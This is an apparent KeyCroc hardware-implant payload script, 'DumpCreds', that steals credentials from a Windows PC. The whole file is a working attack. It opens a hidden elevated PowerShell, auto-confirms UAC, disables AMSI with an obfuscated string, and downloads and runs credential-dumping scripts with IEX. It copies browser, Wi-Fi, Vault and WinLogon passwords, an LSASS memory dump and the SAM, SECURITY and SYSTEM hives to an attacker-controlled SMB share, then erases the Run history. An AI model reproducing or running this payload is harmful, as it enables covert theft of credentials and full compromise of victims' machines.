172 lines
6.5 KiB
Plaintext
172 lines
6.5 KiB
Plaintext
# Title: DumpCreds
|
|
# Author: cerebro11
|
|
# Date: 01/08/2020
|
|
#
|
|
# Description: Dumps the usernames & plaintext passwords from
|
|
# Browsers (Chrome, FireFox)
|
|
# Windows Vault
|
|
# Wi-Fi
|
|
# sam, system, security from Registry => SAM Hashes (only if AdminMode=True)
|
|
# LSASS dump => Mimikatz Dump (only if AdminMode=True)
|
|
# System Information
|
|
# Creds : Payload based on DumpCreds by QDBA
|
|
#
|
|
# Get-ChromeDump.ps1 should be downloaded from "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ChromeDump.ps1" and placed in "/tools/DumpCreds/"
|
|
# Get-FoxDump.ps1 should be downloaded from "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-FoxDump.ps1" and placed in "/tools/DumpCreds/"
|
|
# Out-Minidump.ps1 should be downloaded from "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" and placed in "/tools/DumpCreds/"
|
|
# Requirements: Impacket, gohttp
|
|
|
|
MATCH __dumpcreds
|
|
|
|
LOOTDIR=/root/loot/dumpcreds
|
|
|
|
# Specify target's PC keyboard language
|
|
#export DUCKY_LANG=fr
|
|
|
|
# Switch to ETHERNET ATTACKMODE (Windows)
|
|
if [ ! -f "/tmp/vidpid" ]
|
|
then
|
|
ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678
|
|
else
|
|
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
|
|
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
|
|
ATTACKMODE RNDIS_ETHERNET HID VID_0X$VENDOR PID_0X$PRODUCT
|
|
fi
|
|
QUACK DELAY 5000
|
|
|
|
# Get KeyCroc's LAN IP
|
|
croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
|
|
SHARE="\\\\${croc_ip}\\s"
|
|
|
|
# Loot directory
|
|
timestamp=$(date +%s)
|
|
mkdir -p ${LOOTDIR}/${timestamp}
|
|
|
|
# Temporary www and smb directories
|
|
mkdir -p /tmp/www
|
|
mkdir -p /tmp/smb
|
|
|
|
# Prepare scripts
|
|
cp -r /tools/DumpCreds/* /tmp/www/
|
|
|
|
# Start HTTP and SMB servers
|
|
sleep 2
|
|
cd /tmp/www/ && gohttp -p 80 &
|
|
sleep 2
|
|
python /tools/impacket/examples/smbserver.py s /tmp/smb -smb2support &
|
|
|
|
# Launch cmd as admin (red window)
|
|
QUACK LOCK
|
|
QUACK GUI-r
|
|
QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f /k mode con lines=1 cols=500' -Verb runAs\""
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
|
|
# Bypass UAC :: Change "ALT y" and "ALT n" according to your language i.e. for us it is ALT y (Yes) and ALT n (No)
|
|
# If Admin, UAC prompt will open and Alt y will be used (Alt n won't do anything), if not Admin, Alt n will be used to dismiss (Alt y won't do anything)
|
|
|
|
QUACK DELAY 500
|
|
QUACK ALT-y
|
|
QUACK DELAY 200
|
|
QUACK ENTER
|
|
|
|
QUACK DELAY 500
|
|
QUACK ALT-n
|
|
QUACK DELAY 200
|
|
QUACK ENTER
|
|
|
|
# Start Attack
|
|
# Launch powershell and extract systeminfo
|
|
sleep 2
|
|
QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass"
|
|
QUACK ENTER
|
|
QUACK STRING "[Ref].Assembly.GetType('Sy'+'stem.Managem'+'ent.Aut'+'omation.Am'+'s'+'iUt'+'ils').GetField('a'+'m'+'si'+'In'+'itFa'+'iled','No'+'nPub'+'lic,Static').SetValue(\$null,\$true)"
|
|
QUACK ENTER
|
|
QUACK STRING "\$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")"
|
|
QUACK ENTER
|
|
QUACK STRING "net use $SHARE /user:\"anonymous\" \"\""
|
|
QUACK ENTER
|
|
QUACK STRING "systeminfo | Out-file $SHARE\\DumpCreds_systeminfo.txt"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
|
|
# Extract Chrome, Firefox Data
|
|
QUACK STRING "IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Get-ChromeDump.ps1');"
|
|
QUACK ENTER
|
|
QUACK STRING "Stop-Process -name chrome -ErrorAction SilentlyContinue -Force; sleep 10; Get-ChromeDump -OutFile $SHARE\\DumpCreds_ChromeDump.txt"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
QUACK STRING "IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Get-FoxDump.ps1');"
|
|
QUACK ENTER
|
|
QUACK STRING "Stop-Process -name firefox -ErrorAction SilentlyContinue -Force; sleep 10; Get-FoxDump -OutFile $SHARE\\DumpCreds_FoxDump.txt"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
|
|
# Extract Wi-Fi Data
|
|
QUACK STRING "(netsh wlan show profiles) | Select-String \"\:(.+)\$\" | %{\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"^.+Cont.+\\W+\\:(.+)\$\" | %{\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File $SHARE\\DumpCreds_WiFiDump.txt"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
|
|
# Extract Windows Credentials from PasswordVault and WinLogon registry
|
|
QUACK STRING "[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { \$_.RetrievePassword();\$_ } | Out-File $SHARE\\DumpCreds_VaultDump.txt"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
QUACK STRING "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" | findstr /i \"DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername\" | Out-File $SHARE\\DumpCreds_WinLogon.txt"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
|
|
# If Admin, dump memory of lsass.exe and sam/security/system registries (!WARNING TAKES TIME TO COMPLETE!#)
|
|
QUACK STRING "if (\$isAdmin) { IEX (New-Object Net.Webclient).DownloadString('http://${croc_ip}/Out-Minidump.ps1');}"
|
|
QUACK ENTER
|
|
QUACK STRING "if (\$isAdmin) { Get-Process lsass | Out-Minidump -DumpFilePath $SHARE}"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\sam $SHARE\\sam }"
|
|
QUACK ENTER
|
|
QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\security $SHARE\\security }"
|
|
QUACK ENTER
|
|
QUACK STRING "if (\$isAdmin) { reg.exe save hklm\\system $SHARE\\system }"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
|
|
QUACK STRING "echo EXFILTRATION_COMPLETE > $SHARE\\EXFILTRATION_COMPLETE"
|
|
QUACK ENTER
|
|
|
|
# Remove Run History
|
|
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
|
|
QUACK ENTER
|
|
QUACK DELAY 200
|
|
QUACK STRING "exit"
|
|
QUACK ENTER
|
|
QUACK UNLOCK
|
|
|
|
# Wait until files are done copying.
|
|
while ! [ -f /tmp/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
|
|
|
# Start Cleanup
|
|
sleep 2
|
|
# Delete Exfil file
|
|
rm /tmp/smb/EXFILTRATION_COMPLETE
|
|
# Move data to loot directory
|
|
mv /tmp/smb/* ${LOOTDIR}/${timestamp}
|
|
|
|
# Clean up temporary directories
|
|
rm -rf /tmp/www/
|
|
rm -rf /tmp/smb/
|
|
|
|
# Stop HTTP and SMB servers
|
|
kill $(ps -C "gohttp -p 80" -o pid --no-headers)
|
|
kill $(ps -C "python /tools/impacket/examples/smbserver.py s /tmp/smb -smb2support" -o pid --no-headers)
|
|
|
|
# Deactivate ETHERNET ATTACKMODE
|
|
if [ ! -f "/tmp/vidpid" ]
|
|
then
|
|
ATTACKMODE HID VID_0X1234 PID_0X5678
|
|
else
|
|
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
|
|
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
|
|
ATTACKMODE HID VID_0X$VENDOR PID_0X$PRODUCT
|
|
fi
|
|
|
|
# Complete
|